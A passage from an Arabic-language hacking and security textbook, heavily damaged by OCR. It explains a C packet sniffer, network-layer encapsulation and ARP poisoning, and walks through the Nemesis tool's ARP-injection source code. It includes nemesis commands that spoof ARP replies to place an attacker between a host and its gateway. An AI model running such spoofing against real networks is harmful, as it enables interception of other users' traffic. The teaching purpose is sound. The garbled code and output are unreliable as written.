هذا مُلخص ما يشر إليه هذا ال :field‏ 


The two-octet EtherType field in an Ethernet frame, preceded by destination and source MAC 
addresses, that identifies an upper layer protocol encapsulating the frame data. For example, an 
EtherType value of 0x0800 signals that the frame contains an IPv4 datagram. Likewise, an 
EtherType of 0x0806 indicates an ARP frame, 0x8100 indicates an IEEE 802.1Q frame 


IP, ARP, etc. 00 20 20 3A 
Payload CRC Checksum 
Data 


(46 - 1500 bytes) (4 bytes) 


80 00 20 7A 3F 3E 80 00 20 20 3A AE 08 00 
Destination MAC Address Source MAC Address EtherType 


MAC Header 
(14 bytes) 


aisi eie) e Il Frame 
(64 to 1518 bytes) 


بالنسبة لل function‏ الثانية: 

decode ip( ) 

سنقوم بنفس الأمور التي Gas‏ بها في ال function‏ السابقة. GES.)‏ إلقاء نظرة على ال struct‏ الذي Led‏ بإنشائه.. 
الخاص بال IP Header‏ من قبل. 

قمنا بإنشاء m object‏ پاسم ip. header‏ من ال "struct ip hdr"‏ ابا نفس ال elements‏ الخاصة به. لاحظ أنه 
عندما قَمنا بعر ض ال "Source and Destination IP Addresses"‏ استخدمنا ال function‏ التي LÍ JE‏ هذه 


." ASCII Dotted notation" إلى ال‎ Network type العناوین من ال‎ 
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2 £ 5 £ 
هذه الأسطر:‎ GL 
printf ("\t( Type: %u\t", (aint) ip header-oip type); 
printf("ID: Shu\tLength: thu )\n", ntohs(ip header-»ip id), 
ntohs (ip header-»ip _len)); 


في أول سطر يتم عرض نوع البروتوكول. 
هذا ال field‏ الموجود (à‏ ال IPv4 Header‏ يوضح لنا نوع البروتوكول PCT‏ فمثلا يُشار لل TCP‏ برقم 66 و 
یشار إلى ال UDP‏ برقم 17 و ال ICMP‏ برقم 1. 


ونا 


استخدمنا الرمز (<-) pti)‏ إلى ال Element‏ الخاص بنوع ال IP‏ الموجود داخل ال «IP. Header Structure‏ ثم في 
السطر الثاني نطبع ال «ID‏ في الحقيقة پستخلم هذا ال field‏ في JE‏ رَغبتنا لإرسال Packet‏ كبيرة» فيتم تقطيعها لقطع 
packets‏ صغبرة وار ساطم؛ فنستخدم هذا ال 11610 مع field‏ آخر وهو ال .fragmentation‏ 

رُبا bb‏ نتائج الکود للتأكد ما إذا كان SLA‏ علاقة بين ال packets‏ اللتقطه ببعضها. لاحظ آننا استخدمنا في 
السطر الثاني والثالث ال function‏ التي dx‏ نا من ال network byte order‏ إلى ال .Host byte order‏ 

ار gi‏ دور هذه ال :function‏ 


decode tcp( ) وهى‎ 


u int decode tcp(const u_char *header start) { 
u int header size; 
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unsigned integer 4e 5; function ال‎ oiy الخاص‎ return type نافي البداية أن ال‎ pra 


وقیمته ستظهر في آخر سطر في هذه ال cfunction‏ . .ها هو: 


return header size; 


PES 5 ۰‏ 
هذا ال return value‏ سیذهب إلى ال "tep header length"‏ ..ساذکر لك به: 


tcp header length - 
decode tcp(packet + ETHER HDR LEN + sizeof (struct ip hdr)); 


«Argument ib «decode tep( ) هي ال‎ function ل‎ Call eas هذا السطر يعني أنة‎ 

(هي هذا الشيء الطويل الذي بين القوسین)!۰ تقوم بحساب وتفكيك ال Gy TCP Header‏ النهاية سترجع US‏ 
D 0 a‏ 3 

قيمة "return value"‏ وهى ال $.header size‏ تسب بقية الامور على مايرام» باستثناء شىء بسيط أحب أن 


£ 
أوضحة لك: 


تأمل معي هذا السطر: 


header size = 4 * tcp header-»^tcp offset; 

ماذا نعني به؟ 

4 bytes * offset field یقول:‎ 43! 

هذه bytes JI‏ 4 هى الشر i£‏ العرضية لل la «TCP Header‏ نعلم آن ال Header‏ یتکون من عدة شرائح» ga‏ 


عرض كل شر مه bytes‏ 4 
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وال offset field‏ هذا يحوي عدد الشرائح العرضیه التي cs e‏ استخدامُها في هذا ال Header‏ .. هذا JS‏ بساطة ما 
تعنیه هذه EUST‏ 
وهذا تعریف لهذا ال field‏ من ال RFC‏ الخاصة :TCP Header JL‏ 


Data Offset: 4 bits 
The number of 32 bit words in the TCP Header. This indicates where the 
data begins. The TCP header (even one including options) is an integral number 
of 32 bits long. 


وبالتالى يتم مهذا ال field‏ تحديد ال ."TCP Header Length"‏ 


نكون بهذا قد وصلنا إلى نباية شرح هذا ال Sniffer‏ » والان جاء دور التجربة.. 
استعد لاستقبال هذه اللحظة التاريخية © 


reader@hacking:~/booksre $ gcc -o decode sniff decode sniff.c -lpcap 
reader@hacking:~/booksre $ sudo ./decode sniff 

Sniffing on device ethO0 

==== Got a 75 byte packet ---- 
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[[ Layer 2 :: Ethernet Header ]] 
[ Source: 00:01:29:15:65:b6 Dest: 00:01:6c:eb:1d:50 Type: 8 ] 
(( Layer 3 ::: IP Header )) 
( Source: 192.168.18.1 Dest: 192.168.18.249 ) 
( Type: 6 ID: 7755 Length: 61 ) 
{{ Layer 4 :::: TCP Header }} 
{ Src Port: 35602 Dest Port: 7890 } 
{ Seq #: 2887045274 Ack #: 3843058889 } 
{ Header Size: 32 Flags: PUSH ACK } 


9 bytes of packet data 
74 65 73 74 69 6e 67 Od Oa | 


testing.. 
==== Got a 66 byte packet ==== 
[[ Layer 2 Ethernet Header ]] 
[ Source: 00: 01:6c:eb:1d:50 Dest: 00:01:29:15:65:b6 Type: 8 ] 
(( Layer 3 ::: IP Header )) 


( Source: 192.168.18.249 Dest: 192.168.18.1 ) 

( Type: 6 ID: 15678 Length: 52 ) 
{{ Layer 4 :::: TCP Header }} 
{ Src Port: 7890 Dest Port: 35602 } 
{ Seq #: 3843058889 Ack #: 2887045283 } 
{ Header Size: 32 Flags: ACK } 

No Packet Data 
== Got a 82 byte packet ==== 


[[ Layer 2 :: Ethernet Header ] ] 

[ Source: 00:01:29:15:65:b6 Dest: 00:01:6c:eb:1d:50 Type: 8 ] 
(( Layer 3 ::: IP Header )) 
( Source: 192.168.18.1 Dest: 192.168.18.249 ) 


( Type: ID: 7756 Length: 68 ) 
{ Layer 4 :::: TCP Header }} 


6 
{ 
{ Src Port: 35602 Dest Port: 7890 } 
{ 
{ 


Seq #: 2887045283 Ack #: 3843058889 } 
Header Size: 32 Flags: PUSH ACK } 
16 bytes of packet data 
74 68 69 73 20 69 73 20 61 20 74 65 73 74 00 Oa | this is a test.. 
reader@hacking:~/booksre $ 
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The conclusion 


لاحظنا في المثال السابق كيف تم عمل Decode‏ للطبقات وعرض ال Headers‏ الخاصة بكل e ib‏ ال Data‏ 
الموجودة داخل ال abel) packet‏ أي أننا كنا نستقبل ال data‏ من أسفل (Data-Link Layer)‏ لأعلى 
t$ «(Application Layer)‏ 3( الكود نحسب طول ال Header‏ الخاص بكل طبقة NES e‏ ال packet‏ إلى الطبقة 
T‏ تعلوهاء نقوم هذا العمل أثناء عملية ال "Decapsulation"‏ نستمر حتى تتبقى UJ‏ ال Data‏ الفعلية بعد طرح ال 


elt! Length‏ بجميع ال Headers‏ فنتمكن من عرض oL ge‏ ال Headers‏ و ال Data‏ على الشاشة. 


هذا الشكل يوضح لك هذا الأمر: 
(Application) own‏ 


(Transport) "Header 


IP 


(Internet) ueader 


Frame 


(Li nk) Frame ميل‎ 


Header 


لاحظ الجزء المظلل بالشكل» والذي a‏ عن ال Data‏ وكيف يتم نقلها بين الطبقات» سواءً كانت من أسفل لأعلى كا 
في مثالنا أم العكس!. 
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If we analyze the figure, we see: 
= The application layer sends the data (to be transferred to remote destination) to the transport 
layer. 


= The transport layer puts its header in the beginning and sends this complete packet 
(TCP-header + app-data) to the IP layer. 


* Onthe same lines, The IP layer puts its header in front of the data received from TCP 
So now the structure of IP datagram becomes (IP-header + TCP-header + app-data). 


= This IP datagram is passed to the ethernet layer which on the same lines adds its own header 
to IP datagram and then the whole packet is transmitted over network. 


On the destination host, the reverse process happens. This means that each layer reads its own 
header in the packet and then strips the header so that finally application receives the app-data. 


سننطلق الآن لتكتشف فلسفة ال "ARP Poisoning"‏ 


ARP Poisoning Attack 

آنت الآن تفهم العديد من التفاصيل iilii‏ بال Packet Capturing‏ يتبقى لنا بعض الامور ال ds‏ نود الحديث 

عنها. عندما نقوم باستخدام برنامج كال WireShark‏ أو ال TCPDump‏ على أحد الأجهزة المتصلة ب Switch‏ فهذا 

يعني آننا سَنتمکن من مُراقبة ال traffic‏ القادم إلينا أو الصادر من عندنا. لكن لن نتمكن من مراقبة ما تفعلة بقية 
الأجهزة التى Us‏ في نفس ال Broadcast Domain‏ !!. 
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Understanding Hacking and Information Security القرصنة الإلكترونية مهن المعلوما ره‎ 


هذه الصورة توضح ما نعنیه لاحظ أن ال Sniffer‏ لدیه visibility‏ محدودة: 


Computer D 


Computer A 


Visibility 
Window 


E 


Computer E Computer F 
S 


Computer B Computer C 


Figure 2-4: The visibility window on a switched network is limited 
to the port you are plugged into. 


UŽ‏ هذا الشكل أن ال Sniffer‏ هذا سيتمكن من التقاط ال traffic‏ امار عبر ال Port‏ اخصص له فقط! وبا أن ال 


Switch‏ يمتلك CAM Table‏ فلن پرسل عبر هذا ال port‏ إلا ال Traffic‏ اا إلى ال Sniffer‏ فقط. وبالتالي لن 


AS d e AAA یتمکن ین‎ 


لن لازال بإمكاننا مُراقبة هؤلاء باستخدام طرق أخرى.. منها: 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأحن المعلوماءت‎ 


e‏ أن تمتلك Access‏ على هذا ال Switch‏ فتقوم بتفعيل خاصية ال Port Mirroring‏ به ليقوم بإرسال نُسخة من ال 


Eu a ;‏ 2 
network traffic‏ إلى ال port‏ الذي تحدده أنت a‏ تربط جهازك به. 


هذا الشكل يوضح ال :port mirroring‏ 


Monitoring PC 


ENEEAS 2. 
WIRESHARK mes 


Internet 


e‏ والطريقة الثانية 0,55 عن طريق عَمَل "ARP Spoofing"‏ ويتم ذلك عن طريق إرسال أحدهم ARP Reply‏ إلى 


الأجهزة التي بريد رؤية ال traffic‏ الخاص ec‏ 
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يؤدي ذلك إلى حدوث overwritten‏ لل ARP Cache‏ الخاصة بهم بالبيانات الجديدة الخاصة Attacker JU‏ وهذا ما 


s ۰ و1‎ ۶ 
.ARP Poisoning عليه بال‎ (22; 
Switch 
Q [ D 
> 
5 il 
SS Alice 
* Oy 7 IP: 10.0.0.7 
IP: 10.0.0.1 O Ry کیک‎ MAC: [aa:aa:aa:aa:aa:aa] 
MAC: [bb:bb:bb:bb:bb:bb] br Sa 
o. S Pu 
c. i 0 e 
fee ^, ES 
EA KA NS 
hs AS 
2 “we 
/ S 
Attacker 
IP 10.0.0.3 


MAC: [cc:cc:cc:cc:cc:cc] 


کا ترى فقد eG‏ ال Attacker‏ بعمل overwritten‏ لل ARP Cache‏ الخاصة باليوزر Bob‏ (ليكرة ال IP‏ اخاص ب 
able Alice‏ ال MAC‏ الخاص بال «(Attacker‏ وأيضاً قام بإرسال نفس ال ARP Reply‏ لليوزر Alice‏ ليتم تغيير ال 
ARP Cache‏ لديهاء (فأصبح ال IP‏ الخاص ب abl Bob‏ ال MAC‏ الخاص بال MWAttacker‏ 

هذا لن fla}‏ عملية التواصل بين Bob‏ و «Alice‏ ستتم ولكن „Attacker JI e‏ فبعد وصول البيانات إلى ال 
۲ سیقوم بتعديل ال Headers‏ مرة col‏ وإرجاعهم dl!‏ ال Switch‏ ليقوم بتوصيلهم إلى Alice‏ و .Bob‏ 


وبا أن ال Switch‏ یتعامل بال MAC‏ فقط فلن يلاحظ الخلل احادث. 
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ولكن هذه ال ARP Cache‏ ها timeout‏ دد للاحتفاظ مپذه البیانات لدیها» آلیس کذلك؟ 

tas T‏ هذا ال timeout‏ تکون مدته 05 ۰30 ولكي bibs‏ على عملية ال Redirection‏ هذه فسنقوم بإرسال 
"Spoofed ARP Replies"‏ کل Ss 10 Seconds‏ 

ولكن في مثالنا هذا لن نستفيد كثيراً من إظهار ال traffic‏ المار بين Bob‏ و «Alice‏ سيكون من الأفضل لنا مُتابعة ال 
traffic‏ بین أحد ال users‏ وبين ال Gateway‏ كي تعرف أنشطة هذا ال user‏ على الانترنت. نستخدم لذلك أداة ال 
Ettercap‏ وهي آداة مشهورة تعمل على آنظمة اللینکس وال MAC‏ 

Lal‏ أداة ال Nemesis‏ تقوم بعمل "craft and enject packets"‏ داخل الشبکة. 

وكلاهم يعتمد على مجموعة من ال Libraries‏ أشهرها ال Libnet.c‏ و ال Gl) «Libpcap.c‏ هم بعد قلیل). إن 
أردت تجربة ال Ettercap‏ ستجد 3( Google‏ العديد من الشروحات وملفات الفيديو باللغة العربية تشرح لك طريقة 
Der Ream‏ 

d‏ أن هدفنا فهم فلسفة ال «ARP Poisoning‏ فسنيداً بفتح ملفات ال Source‏ الخاصة بأحد هذه الأدوات 
وتحلیل آلية عملها!. 


Inside Nemesis tool 
المستخدمة ونفهم‎ Functions ال‎ sli الخاصة ہا‎ Source JI سنقوم بتحميل الأداة والإطلاع على ملفات‎ 
على الانترنت: هذه الأداة تعمل في بيئة الويندوز أيضاً.‎ Nemesis ميكانيكية عملها. هذه صفحة آداة ال‎ 
http://nemesis.sourceforge.net/ 


وهذه نبذة سريعة عنها 
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“Nemesis is a command-line network packet crafting and injection utility. 

Nemesis can natively craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, 
TCP and UDP packets". 

Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and 
injected. 


وهذا شكل ملف ال Source‏ بعد تحميله: 


|< | ۵ nemesis-1.4 | src IQ | | =m o © © 


== 
Makefile.in memcmp.c nemesis.c 


#! #! 


nemesis.h nemesis-arp.c nemesis-arp.h 


Documents 
GC #! C 
Downloads 


nemesis-dns.c nemesis-dns.h nemesis-ethernet.c 


Desktop 


Music 


Pictures #! 


: nemesis-ethernet.h nemesis-fileio.c nemesis-functions.c 
Videos 


Trash E 


Floppy Disk nemesis-icmp.c nemesis-icmp.h nemesis-igmp.c 


Computer ۹ "T 


Browse Network nemesis-igmp.h nemesis-ip.c nemesis-ip.h 


Connect to Server 
e #! C 


nemesis-ospf.c nemesis-ospf.h nemesis-printout.c 
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فا اننا مُهتمين «ARP Poison JU‏ سنقوم بفتح nemesis-arp.c alli‏ الوجود بالشکل» وتعرض لك بعض محتویاته: 


/* 
* 510: nemesis-arp.c,v 1.1.1.1 2003/10/31 21:29:36 jnathan Exp و‎ 
* 
* THE NEMESIS PROJECT 
* Copyright (C) 1999, 2000, 2001 Mark Grimes <mark@stateful.net> 
* Copyright (C) 2001 - 2003 Jeff Nathan <jeff@snort.org> 
* 
* nemesis-arp.c (ARP/RARP Packet Injector) 
* 
ey 


#include "nemesis-arp.h" 

#include "nemesis.h" 

dif defined (WIN32) 
#include <pcap.h> 

#endif 

static ETHERhdr etherhdr; 

static ARPhdr arphdr; 
(omitted) 


void nemesis arp(int argc, char **argv) 


{ 


const char *module= "ARP/RARP Packet Injection"; 

nemesis maketitle(title, module, version) ; 

if (argc > 1 && !strncmp(argv[1], "help", 4)) 
arp_usage(argv[0]); 


arp initdata(); 

arp cmdline(argc, argv); 
arp validatedata(); 

arp verbose(); 


if (got payload) 
1 
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LE 


) 


LE 
1 


) 


(bu 


pri 
arp 


else 


1 


pri 
arp 


(builddatafromfile (ARPBUFFSIZE, “pd, 


(const u int32 t) PAYLOADMOD 
arp exit(1); 


ildarp(&etherhdr, &arphdr, &pd, dev 


ntf("Nn$s Injection Failure\n", (ra 


| exit(1); 


ntf("NXn$s Packet Injected Mn", (rarp 


| exit(0); 


(const char *)file, 
E) « 0) 


ice, reply) > 0) 


rp == 0 ? "ARP" : "RARP")); 


-- 0 ? "ARP" : "RARP")); 


.nemesis arp( ) JL poh كان ذلك الملف‎ 


تُستخدم هذه ال function‏ مجموعة من ال data structures‏ خاصة ببيانات «packet header JI‏ تم تعريفهم في بداية 


ال z gl. «function‏ بعد قليل. 


22 


ولكن كيف يحدث Call‏ لهذه ال ) *..nemesis arp(‏ 


هذه ال wid function‏ ها call‏ من ال «main()‏ الموجودة في الملف |S nemesis.c‏ يلى: 


lude 
lude 
lude 
lude 


nain 


«stdio.h» 
<unistd.h> 
<string.h> 
"nemesis.h" 


(int argc, char **argv) 
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char **avtmp, *avval; 
extern int optind; 


avtmp = argv; 
avval = strrchr(*avtmp, '/'); 
if (avval++ == NULL) 
avval = *avtmp; 
if (!strncmp (avval, "nemesis-arp", 11)) 


{ 
nemesis arp(argc, argv); 
} 
else if (argc > 1 && !strncmp(argv[1], "arp", 3)) 
{ 
argv += optind; 
argc -- optind; 
nemesis arp(argc, argv); 


نعود إلى ال nemesis_arp()‏ من جديد: 
ثلاحظ في البداية عملية استدعاء مجموعة من ال "Static defined Structures"‏ لبعض ال :Headers‏ 
Ethernet and ARP Headers.. and more.‏ 


لكننا سنکتفی باظهار ال structures‏ التى po‏ عن ال Ethernet‏ وال ARP‏ فقط. 


static ETHERhdr etherhdr; 
static ARPhdr arphdr; 


يتم استدعائهم من الملف ..nemesis.h‏ 


2 
وتقوم هذه ال function‏ بعمل call‏ لاربعة functions‏ آخری عند عملهاء هم: 


arp initdata(); 
arp cmdline(argc, argv); 
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arp validatedata(); 
arp verbose(); 


هذه ال functions‏ موجودة في نفس ال ملف nemesis-arp.c‏ ..سیقوموا بأدوار متتابعه: 
فالأول تقوم بعمل initialize‏ لل data‏ الخاصة structures JU‏ المطلوبة» ثم الثانية تقوم بالتعامل مع ال cmd-line‏ 
5ه والثالثة للتأكد من صحة البيانات NEST‏ والرابعة خاصة reporting JL‏ 


header structures JL الخاصة‎ elements لترى ال‎ arp initdata( ) ض لك محتويات ال‎ plu 


static void arp initdata (void) 


1 


/* defaults */ 

etherhdr.ether type - ETHERTYPE ARP; /* Ethernet type ARP */ 
memset(etherhdr.ether shost, 0, 6); /* Ethernet source address */ 
memset(etherhdr.ether dhost, Oxff, 6); /* Ethernet dest. address */ 
arphdr.ar op = ARPOP REQUEST; /* ARP opcode: request */ 
arphdr.ar hrd = ARPHRD ETHER; /* hardware format: Ethernet */ 
arphdr.ar pro = ETHERTYPE IP; /* protocol format: IP */ 
arphdr.ar hln - 6; /* 6 byte hardware addresses */ 


I 


arphdr.ar pln - 4; /* 4 byte protocol addresses */ 
memset(arphdr.ar sha, 0, 6); /* ARP frame sender address */ 
memset(arphdr.ar spa, 0, 4); /* ARP sender protocol (IP) addr */ 
memset(arphdr.ar tha, 0, 6); /* ARP frame target address */ 
memset(arphdr.ar tpa, 0, 4); /* ARP target protocol (IP) addr */ 


pd.file mem - NULL; 
pd.file s = 0; 


xs do o NG‏ شکل ال Arguments‏ التي ستستقبلها هذه ال function‏ لتضح لنا الأمور: 
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iu‏ أن نقوم تعمل ping‏ للجهاز il‏ 3 تحويل ال traffic‏ الخاص به tals‏ لل Gateway‏ في الشبکة. سیتولد نتبجة 
لذلك entry‏ في ال arp cache‏ لدينا ہا ال IP Addresses‏ الخاصة بهم مع ال HT MAC‏ 


reader@hacking:~/booksre 5 ping -c 1 -w 1 192.168.0.1 
PING 192.168.0.1 (192.168.0.1): 56 octets data 

64 octets from 192.168.0.1: icmp seq-0 ttl1-64 time-0.4 ms 
--- 192.168.0.1 ping statistics --- 

1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 0.4/0.4/0.4 ms 


reader@hacking:~/booksre $ ping -c 1 -w 1 192.168.0.118 
PING 192.168.0.118 (192.168.0.118): 56 octets data 

64 octets from 192.168.0.118: icmp seq-0 ttl1-128 time-0.4 ms 
--- 192.168.0.118 ping statistics --- 

1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 0.4/0.4/0.4 ms 


reader@hacking:~/booksrce $ arp -na 
? (192.168.0.1) at 00:50:18:00:0F:01 [ether] on ethO 
? (192.168.0.118) at 00:C0:F0:79:3D:30 [ether] on ethO 


X 


reader@hacking:~/booksre $ ifconfig 0 

ethO Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED 
inet addr:192.168.0.193 Bcast:192.168.0.255 Mask:255.255.255.0 
UP BROADCAST NOTRAILERS RUNNING MTU:1500 Metric:1 

RX packets:4153 errors:0 dropped:0 overruns:0 frame:0 

TX packets:3875 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:100 
RX bytes:601686 (587.5 Kb) TX bytes:288567 (281.8 Kb) 
Interrupt:9 Base address:0xc000 
reader@hacking:~/booksrcec $ 


بعد تنفيذ الأمر 26b "arp na"‏ لنا عناوين JS‏ من الجهاز وال gateway‏ اراد عمل MITM Attack‏ عليهم. 


سَنقوم بتشغيل ال nemesis‏ وتنفيذ اشجوم عليهم كا يلي: 
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Running Nemesis 


reader@hacking:~/booksre $ sudo nemesis arp -v -r -d eth0 -S 
192.168.0.1 -D 192.168.0.118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 
-H 00:00:AD:D1:C7:ED -M 00:C0O:F0:79:3D:30 


ARP/RARP Packet Injection --- The NEMESIS Project Version 1.4 


[MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30 
[Ethernet type] ARP (0x0806) 


[Protocol addr:IP] 192.168.0.1 » 192.168.0.118 

[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:C0:F0:79:3D:30 
[ARP opcode] Reply 

RP hardware fmt] Ethernet (1) 

RP proto format] IP (0x0800) 

RP protocol len] 6 

RP hardware len] 4 


Dm pm 


Wrote 42 byte unicast ARP request packet through linktype DLT EN1OMB 


ARP Packet Injected 

reader@hacking:~/booksre $ sudo nemesis arp -v -r -d eth0 -S 
192.168.0.118 -D 
192.168.0.1 -h 00:00:AD:D1:C7:ED -m 00:50:18:00:0F:01 -H 
00:00:AD:D1:C7:ED -M 

00:50:18:00:0F:01 


ARP/RARP Packet Injection --- The NEMESIS Project Version 1.4 


[MAC] 00:00:AD:D1:C7:ED » 00:50:18:00:0F:01 
[Ethernet type] ARP (0x0806) 


[Protocol addr:IP] 192.168.0.118 » 192.168.0.1 
[Hardware addr:MAC] 00:00:AD:D1:C7:ED » 00:50:18:00:0F:01 
[ARP opcode] Reply 

[ARP hardware fmt] Ethernet (1) 
[ARP proto format] IP (0x0800) 
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[A] 
[A] 


Wrote 42 byte unicast ARP request packet through linktype DLT EN1OMB. 


ARP 


RP protocol len] 6 
RP hardware len] 4 


Packet Injected 


reader8ühacking:-/booksrc $ 


لقد قمنا باستخدام بعض ال options‏ في هذا ال «command‏ سأعرض لك جزء من ال man page‏ الخاصة ہا لتفهم 


reader 


26) 


arp 


-8 
zb 
-h 


E 
=R 
=P 


ARP/RARP Usage: 


[-v (verbose)] [options 


ARP/RARP Options: 


<Source IP address> 
<Destination IP address 


] 


> 


- The NEM 


«Sender MAC address within ARP 
-m «Target MAC address within ARP 
({ARP,RARP} REPLY enable) 


(RARP enable) 
«Payload file» 


Data Link Options: 


-d 
=H 


<Ethernet device name> 
<Source MAC address> 


-M <Destination MAC address> 


You must define a Source and Destination 


ES 


@hacking:~/booksre $ nemesis arp help 
ARP/RARP Packet Injection - 


S Project Version 1.4 (Build 


€ 


€ 


frame» 
frame» 


IP address. 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماءه‎ 


لقد عرّفنا كيف تعمل هذه الأداة» هيا لِتعود إلى ال function‏ الخاصة ARP Poison JL‏ وهی ) Nemesis arp(‏ 


لاستكمل دورها. 


بعد عمل dn U call‏ 5 التى أوضحناها da‏ يتم à‏ النهاية استدعاء ال ) buildarp(‏ والتى » تقوم 
بتكوين ال ARP Packet‏ وعمل inject‏ ها. توجد في ملف مستقل کا ترى في الشکل: "nemesis-proto arp.c"‏ 


Open > m سردا تسکت‎ 8 
-/nemesis-1.4/src 


#include "nemesis-arp.h" 
#include "nemesis.h" 


int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char *device, 
int reply) 
{ 


int n:= 8; 

u int32 t arp packetlen; 

static u int8 t *pkt; 

struct libnet link int *12 - NULL; 


/* validation tests */ 
if (pd-»file mem == NULL) 
pd->file s = 0; 


arp packetlen = LIBNET ARP H + LIBNET ETH H + pd->file s; 


#ifdef DEBUG 
printf("DEBUG: ARP packet length %u.\n", arp packetlen); 
printf("DEBUG: ARP payload size %u.\n", pd-»file s); 
#endif 


if ((12 = libnet open link interface(device, errbuf)) == NULL) 

1 
nemesis device failure(INJECTION LINK, (const char *)device); 
return -1; 
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int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char 
*device, int reply) 


1 
int n = 0; 
u int32 t arp packetlen; 
static u int8 t *pkt; 
struct libnet link int *12 = NULL; 


/* validation tests */ 
if (pd->file mem == NULL) 
pd->file s = 0; 


arp packetlen = LIBNET ARP H + LIBNET ETH H + pd->file s; 


#ifdef DEBUG 
printf ("DEBUG: ARP packet length %u.\n", arp packetlen) ; 
printf ("DEBUG: ARP payload size %u.\n", pd->file_s); 

#fendif 


if ((12 = libnet open link interface (device, errbuf)) == NULL) 
{ 


nemesis device failure (INJECTION LINK, (const char *)device); 


return -1; 


) 


if (libnet init packet(arp packetlen, &pkt) -- -1) 


{ 
fprintf(stderr, "ERROR: Unable to allocate packet memory.\n"); 


return -1; 
} 
libnet build ethernet (eth->ether dhost, eth->ether shost, 
eth->ether type NULL, 0, pkt); 


libnet build arp(arp-»ar hrd, arp->ar_pro, arp->ar_hln, 
arp->ar_pln, arp->ar_op, arp-»ar sha, arp-»ar spa, 


arp-»ar tha, arp-»ar tpa, pd->file mem, pd->file s, 
pkt + LIBNET ETH H); 


Security & Attacks 
[239] 


n = libnet write link layer(12, device, pkt, LIBNET ETH H + 
LIBNET ARP H + pd-»file s); 


if (verbose -- 2) 
nemesis hexdump(pkt, arp packetlen, HEX ASC DECODE) ; 
if (verbose == 3) 
nemesis hexdump(pkt, arp packetlen, HEX RAW DECODE); 
if (n != arp packetlen) 


fprintf(stderr, "ERROR: Incomplete packet injection. Only " 
"wrote Sd bytes.\n", n); 


if (verbose) 


if (memcmp(eth->ether dhost, (void *)&one, 6)) 


printf ("Wrote Sd byte unicast ARP request packet through " 
"linktype %s.\n", n, 
nemesis lookup linktype(l12-»linktype)); 
} 
else 
{ 
printf ("Wrote 50 byte 55 packet through linktype %s.\n", 
n, (eth->ether type == ETHERTYPE ARP ? "ARP" 
"RARP"), nemesis lookup linktype (12-»linktype)); 


} 
} 
} 
libnet destroy packet (&pkt) ; 
if (12 != NULL) 
libnet close link interface(12); 
return (n); 
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وبا ol‏ هذه ال function‏ ستقوم بتكوين ال packet‏ وعمل U inject‏ عبر كارت الشبکت ast ul E we‏ ال 


:&JUJI Arguments 


int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char 
*device, int reply) 


ستحتاج لاستخدام ال "Ethernet Header Structure"‏ و Lad‏ ال "ARP Header Structure"‏ من ال Nemesis.h‏ 
.Lib‏ 
سنقوم بتسليط الضوء على de pat‏ من ال functions‏ التي تقوم بدور حوري في هذا الكود: 


1- libnet open link interface() 


2- libnet init packet () 


3- libnet build ethernet() 


4- libnet build arp() 


5- libnet write link layer() 


doo las )1(‏ وهي: 


libnet open link interface(device, rrbuf) 
A 


Link- الخاص بال‎ Frame كي نستطيع كتابة ال‎ packet interface ez تقوم‎ «"low-level function" هذه‎ pos 


. من قبا‎ sniffer عنه فى ال‎ LAS الذى‎ error buffer وال‎ interface device لل‎ Arguments jet و‎ Layer 
من ف‎ à d هي و‎ 


(2) ثم نأق للثانية: 
libnet init packet(arp packetlen, &pkt)‏ 


واضح من الا سم uel‏ تقوم بعمل initialize‏ لل packet‏ كي يتم استخدامها. 
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.."arp packetlen" الأول‎ argument هذا ال‎ 


"a7 


:ARP Packet به حجم ال‎ e عباره عن مُتغير تم تعریفه في بداية الكود‎ 
u int32 t arp packetlen; 
arp packetlen = LIBNET ARP H + LIBNET ETH H + pd->file s; 


سيحوي هذا pe‏ ال ARP Header‏ و ال Ethernet Header‏ و ال ARP Payload Size‏ والثاني ”امع " هو ال 


(Address of this packet in memory) 

i eai‏ تتلخص وظيفة هذه ال function‏ بأنا تقوم بعمل memory allocation‏ لل packet‏ المراد استخدامهاء 
وبالتالي سنكون بحاجة لعمل call‏ بشكل ما لل ) --malloc(‏ هل Sis‏ هذه ال ) malloc(‏ ؟؟. 

کا تعلم أن عملية ال allocation‏ تحتاج بعد انتهاء الطلوب أن نستخدم ال ) Free(‏ لعمل | Destroy‏ لل .memory‏ 


Pw‏ ي استخدام function‏ لذلك. libnet. destroy. packet( ( L|‏ تجدها في آخر الکود. 


)3( والثالثه: 


libnet build ethernet(eth-»ether dhost, eth-»ether shost, 
eth->ether type NULL, 0, pkt); 


.ethernet struct الخاصة بال‎ Elements فهي تستخدم ال‎ cEthernet Packet تقوم هذه بتكوين ال‎ 
"ARP, or IP" ..ether packet على نوع ال‎ J ether type هذا ال‎ LÍ 


)4( ثم الرابعة: 


libnet build arp(arp-»ar hrd, arp-»ar pro, arp-»ar hln, 
arp-»ar pln, arp-»ar op, arp-»ar sha, arp-»ar spa, 
arp->ar tha, arp-»ar tpa, pd->file mem, pd-»file s, 
pkt + LIBNET ETH H); 


هذه تشبه الثالثة.. ولكنها ستقوم بتكوين ال ARP Packet‏ . 
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مايل توضيح لل issil Elements‏ في هذه ال :function‏ 


hardware address type, protocol address type, the hardware address length, 

the protocol address length, the ARP packet type, the sender hardware address, the sender 
protocol address, the target hardware address, the target protocol address, 

the packet payload, the payload size, and finally, a pointer to the packet header memory. 


T 
function ثم تأي هذه ال‎ (5) 
libnet write link layer() 


لتقوم بعمل oid write‏ ال packet‏ إلى ال device‏ ليقوم بعملية ال inject‏ 


(à,‏ النهاية تقوم ال 1ibnet destroy packet(spkt)‏ بعمل free‏ لل memory‏ التي تم تخصيصها لل 


:function باستخدام هذه ال‎ í أخير‎ "low-level interface" علق ال‎ 4 .Packet 


libnet close link interface 


ذا نكون قد انتهينا من ال ."ARP Poisoning"‏ 


